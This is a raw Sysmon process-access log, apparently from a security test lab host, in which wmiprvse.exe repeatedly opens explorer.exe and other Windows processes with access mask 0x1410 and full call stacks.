RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238307Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238306Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238305Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238304Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238303Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238302Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238301Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238300Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238299Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238298Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238297Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238296Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238295Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238294Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5A8B-603E-E3A7-00000000AD01}11288C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238293Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238292Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238291Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59C3-603E-C8A7-00000000AD01}15472C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238290Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238289Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238288Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238287Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 